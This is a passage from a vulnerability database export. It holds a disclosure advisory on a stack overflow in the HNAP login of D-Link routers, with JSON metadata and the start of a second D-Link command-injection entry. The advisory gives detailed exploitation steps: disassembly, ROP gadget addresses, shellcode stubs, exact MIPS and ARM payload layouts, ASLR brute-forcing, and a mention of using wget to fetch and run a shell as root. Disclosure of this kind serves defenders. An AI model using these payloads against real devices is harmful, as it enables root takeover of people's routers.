For more information regarding\nHNAP, see [1] and [2]. \n\nDlink has a long history of vulnerabilities in HNAP. Craig Heffner in\nparticular seems to have found a lot of them (see [3], [4], [5], [6],\n[7], [8]). The affected function\ncontains two subsequent stack overflows, which can be exploited by an\nunauthenticated attacker on the LAN. It affects a number of Dlink\nrouters which span the ARM and MIPS architectures. A Metasploit module\nthat exploits this vulnerability for both architectures has been\nreleased [9]. \n\nA special thanks to CERT/CC and Trent Novelly for help with disclosing\nthis vulnerability to the vendor. Please refer to CERT\u0027s advisory for\nmore details [10]. See below\nfor other constraints. \nAffected versions:\n The following MIPS devices have been confirmed to be vulnerable:\n DIR-823\n DIR-822\n DIR-818L(W)\n\n The following ARM devices have been confirmed to be vulnerable:\n DIR-895L\n DIR-890L\n DIR-885L\n DIR-880L\n DIR-868L -\u003e Rev. B and C only\n\n There might be other affected devices which are not listed above. \n\n-----------------------\nVulnerability details and MIPS exploitation\n-----------------------\n\nThe vulnerable function, parse_xml_value (my name, not a symbol), is\ncalled from hnap_main (a symbol in the binary) in /htdocs/cgibin. \nThis function takes 3 arguments: the first is the request object /\nstring, the second is the XML tag name to be parsed inside the request,\nand the third is a pointer to where the value of that tag should be\nreturned. \n\nThe function tries to find the tag name inside the request object and\nthen extracts the tag value, copying it first to a local variable and\nthen to the third argument. This function is called from hnap_main when\nperforming the HNAP Login action to obtain the values of Action,\nUsername, LoginPassword and Catpcha from the SOAP request shown above. \n\nparse_xml_value(char* request, char* XMLtag, char* tag_value)\n(...)\n.text:00412264 xml_tag_value_start = $s2\n.text:00412264 xml_tag_value_end = $s1\n.text:00412264 C30 addu xml_tag_value_start, $v0, $s0\n # s2 now points to \u003cAction\u003e$value\u003c/Action\u003e\n.text:00412268 C30 la $t9, strstr\n.text:0041226C C30 move $a1, xml_tag_value_end # needle\n.text:00412270 C30 jalr $t9 ; strstr\n.text:00412274 C30 move $a0, xml_tag_value_start #\nhaystack\n.text:00412278 C30 lw $gp, 0xC30+var_C20($sp)\n.text:0041227C C30 beqz $v0, loc_4122BC\n.text:00412280 C30 subu xml_tag_value_end, $v0,\nxml_tag_value_start # s1 now holds the ptr to \u003cAction\u003evalue$\u003c/Action\u003e\n.text:00412284 C30 bltz xml_tag_value_end, loc_4122BC\n.text:00412288 C30 addiu $s0, $sp, 0xC30+xml_tag_var\n.text:0041228C C30 la $t9, strncpy\n.text:00412290 C30 move $a2, xml_tag_value_end # n\n.text:00412294 C30 move $a1, xml_tag_value_start # src\n.text:00412298 C30 addu xml_tag_value_end, $s0,\nxml_tag_value_end\n.text:0041229C C30 jalr $t9 ; strncpy # copies all\nchars in \u003cAction\u003e$value$\u003c/Action\u003e to xml_tag_var using strncpy\n.text:004122A0 C30 move $a0, $s0 # dest\n.text:004122A4 C30 move $a0, a2_ptr # a2_ptr is\na stack variable from hnap_main (passed as third argument to\nparse_xml_value)\n.text:004122A8 C30 lw $gp, 0xC30+var_C20($sp)\n.text:004122AC C30 move $a1, $s0 # src\n.text:004122B0 C30 la $t9, strcpy\t# copies\nxml_tag_var into a2_ptr using strcpy\n.text:004122B4 C30 jalr $t9 ; strcpy # the stack\nof the calling function (hnap_main) is thrashed if 2408+ bytes are sent\n.text:004122B8 C30 sb $zero, 0(xml_tag_value_end)\n(...)\n\nThere are two overflows, therefore two choices for exploitation:\n1) The local stack (on parse_xml_value) can be overrun with 3096+ bytes. \nThis overflow occurs even though strncpy is used, because the argument\nto strncpy is simply the strlen of the value inside the XML tag. \n2) Alternatively, it\u0027s possible to overrun the stack of the calling\nfunction (hnap_main), using only 2408+ bytes - this is because strcpy is\nused to copy the xml_tag_var onto the third argument received by\nparse_xml_value, which is a pointer to a stack variable in hnap_main. \n\nExploiting 1) is easier, and the following example will explain how. \n\nAll the affected MIPS devices use the same version of uClibc\n(libuClibc-0.9.30.3.so) and seem to load it at 0x2aabe000, which makes\nexploitation trivial for all firmware versions. It should be noted that\nthe MIPS devices use the RTL8881a CPU, which is based on a Lextra\nRLX5281 core. The Lextra RLX cores are MIPS clones, but they\u0027re bit\ncrippled as they are lacking a few load and store instructions. For this\nreason, some generic shellcodes that work on MIPS might not work on\nthese CPUs (especially when obfuscated). \n\nThe devices also do not have NX, ASLR nor any other modern memory\nprotections, so the shellcode is executed directly on the stack. \nHowever, it\u0027s necessary to use ROP to prepare the stack for execution,\nwhich can be executed with gadgets taken from libuClibc-0.9.30.3.so. \nDue to the way MIPS CPUs work, it\u0027s necessary to flush the CPU cache\nbefore executing the exploit. This can be forced by calling sleep() from\nlibc (refer to\nhttp://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html for\nan explanation on the MIPS CPU caches). \n\nSo the ROP chain and shellcode will look like:\n\nfirst_gadget - execute sleep and call second_gadget\n.text:0004EA1C move $t9, $s0 \u003c- sleep()\n.text:0004EA20 lw $ra, 0x20+var_4($sp) \u003c- second_gadget\n.text:0004EA24 li $a0, 2 \u003c- arg for sleep()\n.text:0004EA28 lw $s0, 0x20+var_8($sp)\n.text:0004EA2C li $a1, 1\n.text:0004EA30 move $a2, $zero\n.text:0004EA34 jr $t9\n.text:0004EA38 addiu $sp, 0x20\n\nsecond_gadget - puts stack pointer in a1:\n.text:0002468C addiu $s1, $sp, 0x58\n.text:00024690 li $s0, 0x44\n.text:00024694 move $a2, $s0\n.text:00024698 move $a1, $s1\n.text:0002469C move $t9, $s4\n.text:000246A0 jalr $t9\n.text:000246A4 move $a0, $s2\n\nthird_gadget - call $a1 (which now has the stack pointer):\n.text:00041F3C move $t9, $a1\n.text:00041F40 move $a1, $a2\n.text:00041F44 addiu $a0, 8\n.text:00041F48 jr $t9\n.text:00041F4C nop\n\nWhen the crash occurs, the stack pointer is at xml_tag_value[3128]. In\norder to have a larger space for the shellcode (3000+ bytes), it\u0027s\npossible to jump back to xml_tag_value[0]. \n prep_shellcode_1 = 23bdf3c8 \t\t# addi\tsp,sp,-3128\n prep_shellcode_2 = 03a0f809 \t\t# jalr\tsp\n branch_delay =\t\t 2084f830 \t # addi\ta0,a0,-2000 (NOP executed as a\nMIPS branch delay slot)\n\nThe final Action / Username / LoginPassword / Catpcha XML parameter\nvalue will be:\nshellcode + \u0027a\u0027 * (3072 - shellcode.size) + sleep() + \u00271\u0027 * 4 + \u00272\u0027 * 4\n+ \u00273\u0027 * 4 + third_gadget + first_gadget + \u0027b\u0027 * 0x1c + second_gadget +\n\u0027c\u0027 * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay\n\n\u0027a\u0027, \u0027b\u0027 and \u0027c\u0027 are just fillers to make up the buffer, while \u00271111\u0027,\n\u00272222\u0027 and \u00273333\u0027 will be the values of s1, s2 and s3 registers (which\nare not interesting for exploitation), and the rest is the ROP chain,\nshellcode and stack preparation routine. The only bad character that\ncannot be sent in the payload is the null byte as this is a str(n)cpy\noverflow. Up to 3350 characters can be sent, as after that it\u0027s hard to\ncontrol the overflow in a reliable way. Note that all of this is to\nexploit the first buffer overflow with strncpy, but the second buffer\noverflow can be exploited in a similar way. \n\nAs explained above, due to the use of a crippled MIPS core, generic\nshellcodes found on the Internet will likely fail. Some very simple ones\nwork, but the best is to craft a reliable one. The simple Metasploit\nbind shell also seems to work pretty reliably if no encoder is used. \n\n-----------------------\nARM exploitation\n-----------------------\n\nThe same two stack overflows affect ARM, but require less bytes to\noverflow the stack. The following snippet is the same part of\nparse_xml_value as shown for MIPS (taken from firmware 2.03b01 for the\nDIR-868 Rev. B):\n.text:00018F34 C30 LDR R1, [R11,#src] ; src\n.text:00018F38 C30 LDR R2, [R11,#n] ; n\n.text:00018F3C C30 SUB R3, R11, #-xml_tag_var\n.text:00018F40 C30 SUB R3, R3, #4\n.text:00018F44 C30 SUB R3, R3, #4\n.text:00018F48 C30 MOV R0, R3 ; dest\n.text:00018F4C C30 BL strncpy ; first overflow occurs here\n(xml_tag_var in parse_xml_stack) with 1024+ characters\n.text:00018F50 C30 MOV R3, #0xFFFFFBEC\n.text:00018F58 C30 LDR R2, [R11,#n]\n.text:00018F5C C30 SUB R1, R11, #-var_4\n.text:00018F60 C30 ADD R2, R1, R2\n.text:00018F64 C30 ADD R3, R2, R3\n.text:00018F68 C30 MOV R2, #0\n.text:00018F6C C30 STRB R2, [R3]\n.text:00018F70 C30 SUB R3, R11, #-xml_tag_var\n.text:00018F74 C30 SUB R3, R3, #4\n.text:00018F78 C30 SUB R3, R3, #4\n.text:00018F7C C30 LDR R0, [R11,#a2_ptr] ; a2_ptr is is a\nstack variable from hnap_main\n.text:00018F80 C30 MOV R1, R3 ; src\n.text:00018F84 C30 BL strcpy ; second overflow occurs here\n\nThe stack size will be smaller for both parse_xml_value and hnap_main\nwhen compared to the MIPS binary. This time again it\u0027s easier to exploit\nthe easier strncpy overflow in parse_xml_value, but only 1024 bytes are\nenough to overflow the stack. As with the MIPS exploit, the only bad\ncharacter is the null byte. \n\nThe affected ARM devices have a non-executable stack (NX) and 32 bit\nASLR. NX can be defeated with ROP, and the 32 bit ASLR is weak - there\nare only 3 bytes that change in the address calculations, which means\nthere are only 4096 possible values. The attack has to be run several\ntimes until the correct base address is hit, but this can usually be\nachieved in less than 1000 attempts. \n\nThe easiest attack to perform is a return-to-libc to execute a command\nwith system(). To do this, R0 must point to the stack location where the\ncommand is before system() is called. All the affected ARM devices seem\nto use the same version of uClibc (libuClibc-0.9.32.1.so) for all\nfirmware versions, which makes gadget hunting much easier and allows\nbuilding an exploit that works on all the devices without any modification. \n\nfirst_gadget (pops system() address into r3, and second_gadget into PC):\n.text:00018298 LDMFD SP!, {R3,PC}\n\nsecond_gadget (puts the stack pointer into r0 and calls system() at r3):\n.text:00040CB8 MOV R0, SP\n.text:00040CBC BLX R3\n\nsystem() (Executes argument in r0 (our stack pointer)\n.text:0005A270 system\n\nThe final Action / Username / LoginPassword / Catpcha XML parameter\nvalue will be:\n\u0027a\u0027 * 1024 + 0xffffffff + \u0027b\u0027 * 16 + \u0027AAAA\u0027 + first_gadget + system() +\nsecond_gadget + command\n\na / b = filler\n0xffffffff = integer n (see below)\nAAAA = R11\nfirst_gadget = initial PC\npayload = stack points here after execution of our ROP chain; it should\npoint to whatever we want system() to execute\n\nWhen the overflow happens, the stack var \"n\" is overwritten, which is\nused to calculate a memory address (see 0x18F58). In order not to crash\nthe process before the shellcode is executed, the variable needs to be\nset to a numeric value that can be used to calculate a valid memory\naddress. A good value to choose is 0xffffffff, as this will just\nsubtract 1 from the calculated memory address and prevent an invalid\nmemory access. \n\nFrom this point onwards, it\u0027s possible to execute any command in\n\"payload\". For example, wget can be used to download a shell and execute\nit or a telnet server can be started. All commands will be executed as root. \n\n\n\u003e\u003e Fix:\nDlink did not respond to my or CERT\u0027s request for information, so no\nfirmware fix is available at the time of writing. \nGiven that this vulnerability can only be exploited in the LAN, it is\nrecommended to have a strong wireless password to prevent untrusted\nclients from connecting to the router. \n\n\n\u003e\u003e References:\n[1]\nhttps://isc.sans.edu//diary/More+on+HNAP+-+What+is+it,+How+to+Use+it,+How+to+Find+it/17648\n\n[2] https://en.wikipedia.org/wiki/Home_Network_Administration_Protocol\n[3] http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/\n[4] http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/\n[5] http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/\n[6]\nhttps://packetstormsecurity.com/files/134370/D-Link-DIR-818W-Buffer-Overflow-Command-Injection.html\n[7] https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf\n[8]\nhttp://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection\n[9] https://github.com/rapid7/metasploit-framework/pull/7543\n[10] https://www.kb.cert.org/vuls/id/677427\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-6563"
},
{
"db": "CERT/CC",
"id": "VU#677427"
},
{
"db": "CERT/CC",
"id": "VU#305448"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "PACKETSTORM",
"id": "139611"
}
],
"trust": 3.6
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/677427",
"trust": 0.8,
"type": "poc"
},
{
"reference": "https://www.kb.cert.org/vuls/id/305448",
"trust": 0.8,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-95383",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40805",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#677427"
},
{
"db": "CERT/CC",
"id": "VU#305448"
},
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#677427",
"trust": 4.6
},
{
"db": "NVD",
"id": "CVE-2016-6563",
"trust": 3.0
},
{
"db": "BID",
"id": "94130",
"trust": 2.1
},
{
"db": "EXPLOIT-DB",
"id": "40805",
"trust": 1.8
},
{
"db": "DLINK",
"id": "SAP10066",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#305448",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU99822187",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "139611",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "139836",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-95383",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-6563",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#677427"
},
{
"db": "CERT/CC",
"id": "VU#305448"
},
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"id": "VAR-201807-0057",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
}
],
"trust": 0.678610265
},
"last_update_date": "2024-11-23T23:12:06.301000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Technical Support",
"trust": 0.8,
"url": "http://support.dlink.com/"
},
{
"title": "HNAP stack overflow :: DIR-8xx Routers Affected : All Models have Remote Admin Disabled as Default ",
"trust": 0.8,
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10066"
},
{
"title": "Multiple D-Link Repair measures for router buffer error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=99597"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.9,
"url": "https://www.kb.cert.org/vuls/id/677427"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/40805/"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/94130"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2016/nov/38"
},
{
"trust": 1.7,
"url": "https://raw.githubusercontent.com/pedrib/poc/master/advisories/dlink-hnap-login.txt"
},
{
"trust": 1.6,
"url": "https://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6563"
},
{
"trust": 0.8,
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10066"
},
{
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6563"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu99822187"
},
{
"trust": 0.3,
"url": "http://www.dlink.co.in/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49611"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework/pull/7543"
},
{
"trust": 0.1,
"url": "http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/"
},
{
"trust": 0.1,
"url": "https://en.wikipedia.org/wiki/home_network_administration_protocol"
},
{
"trust": 0.1,
"url": "https://isc.sans.edu//diary/more+on+hnap+-+what+is+it,+how+to+use+it,+how+to+find+it/17648"
},
{
"trust": 0.1,
"url": "http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/134370/d-link-dir-818w-buffer-overflow-command-injection.html"
},
{
"trust": 0.1,
"url": "http://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection"
},
{
"trust": 0.1,
"url": "http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/"
},
{
"trust": 0.1,
"url": "https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#677427"
},
{
"db": "CERT/CC",
"id": "VU#305448"
},
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#677427"
},
{
"db": "CERT/CC",
"id": "VU#305448"
},
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-07T00:00:00",
"db": "CERT/CC",
"id": "VU#677427"
},
{
"date": "2017-03-08T00:00:00",
"db": "CERT/CC",
"id": "VU#305448"
},
{
"date": "2018-07-13T00:00:00",
"db": "VULHUB",
"id": "VHN-95383"
},
{
"date": "2018-07-13T00:00:00",
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"date": "2016-11-07T00:00:00",
"db": "BID",
"id": "94130"
},
{
"date": "2016-11-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"date": "2016-11-08T16:44:46",
"db": "PACKETSTORM",
"id": "139611"
},
{
"date": "2016-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"date": "2018-07-13T20:29:01.003000",
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-08T00:00:00",
"db": "CERT/CC",
"id": "VU#677427"
},
{
"date": "2017-03-08T00:00:00",
"db": "CERT/CC",
"id": "VU#305448"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-95383"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"date": "2016-11-24T01:08:00",
"db": "BID",
"id": "94130"
},
{
"date": "2017-03-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"date": "2024-11-21T02:56:21.790000",
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link routers HNAP service contains stack-based buffer overflow",
"sources": [
{
"db": "CERT/CC",
"id": "VU#677427"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
],
"trust": 0.6
}
}
var-201803-1769
Vulnerability from variot
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. plural D-Link The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-880L and others are all wireless router products of D-Link. An operating system command injection vulnerability exists in the soap.cgi file in several D-Link products. A remote attacker can exploit this vulnerability to execute arbitrary operating system commands with the help of the \342\200\230service\342\200\231 parameter. The following products and versions are affected: DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and earlier; DIR-868L DIR868LA1_FW112b04 and earlier; DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L and earlier DIR410b_
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1769",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-865l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw112b04"
},
{
"model": "dir-880l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "reva_firmware_patch_1.08b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw110b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir860la1_fw110b04"
},
{
"model": "dir-865l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir-865l_reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir868la1_fw112b04"
},
{
"model": "dir-880l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir-880l_reva_firmware_patch_1.08b04"
},
{
"model": "dir-880l \u003cdir-880l reva patch 1.08b04",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-860l \u003c=dir860la1 fw110b04",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-865l \u003c=dir-865l reva patch 1.08.b01",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-860l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw110b04"
},
{
"model": "dir-865l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw112b04"
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "reva_firmware_patch_1.08b04"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06671"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-149"
},
{
"db": "NVD",
"id": "CVE-2018-6530"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-860l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-865l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-880l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002681"
}
]
},
"cve": "CVE-2018-6530",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
